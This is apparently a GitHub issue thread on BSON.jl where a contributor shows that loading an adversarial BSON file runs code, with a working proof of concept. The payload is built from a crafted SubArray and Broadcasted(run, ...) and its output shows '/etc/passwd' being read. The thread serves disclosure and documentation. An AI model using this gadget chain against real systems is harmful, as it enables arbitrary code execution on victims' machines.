Explicitly document that loading of files is insecure

[chethega]

We had some discussion on slack that loading of adversarial BSON files is insecure by design and intention. Hence, this is not really a security issue, and requires no responsible disclosure. However, I think we could document this better, and maybe keep this issue open as catch-all discussion thread for security aspects of BSON.jl.

On slack, @oxinabox asked for a PoC. Find a PoC attached (expected behavior: parse should work without issue and allow you to inspect the file; load runs cat /etc/passwd before erroring out; you might consider using a VM for that).

Code execution is obtained by triggering a convert of a SubArray, which in turn triggers a getindex on a Base.Broadcast.Broadcasted(run, ([`cat /etc/passwd`],)).

poc.bson.zip

[chethega]

Without risking me compromising your machine:

julia> using BSON
julia> struct SubArray{T,N,P,I,L}<:AbstractArray{T,N}
       parent
       indices
       offset1
       stride1
       end
julia> br=Base.Broadcast.Broadcasted(run, ([`cat /etc/passwd`],));
julia> v=SubArray{Any,1, Any,Tuple{Array{Int64,1}}, false}(br, ([1],), 0, 0);
julia> w=SubArray{Any,1, Any,Tuple{Array{Int64,1}}, false}(1:5, (v,), 0, 0);
julia> BSON.bson("poc.bson", a=w);

Then start a new julia session:

julia> using BSON
julia> BSON.load("poc.bson");
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
[...]
ERROR: MethodError: Cannot `convert` an object of type Base.Process to an object of type Int64

[MikeInnes]

Just wondering: is this actually due to the BSON loading process, or due to the show method invoked by the REPL?

I figured the BSON loading could probably be made secure (though obviously that's pretty moot for most users if any practical usage of that data is unsafe).

[oxinabox]

it is actually the loading. Note the ; at the end.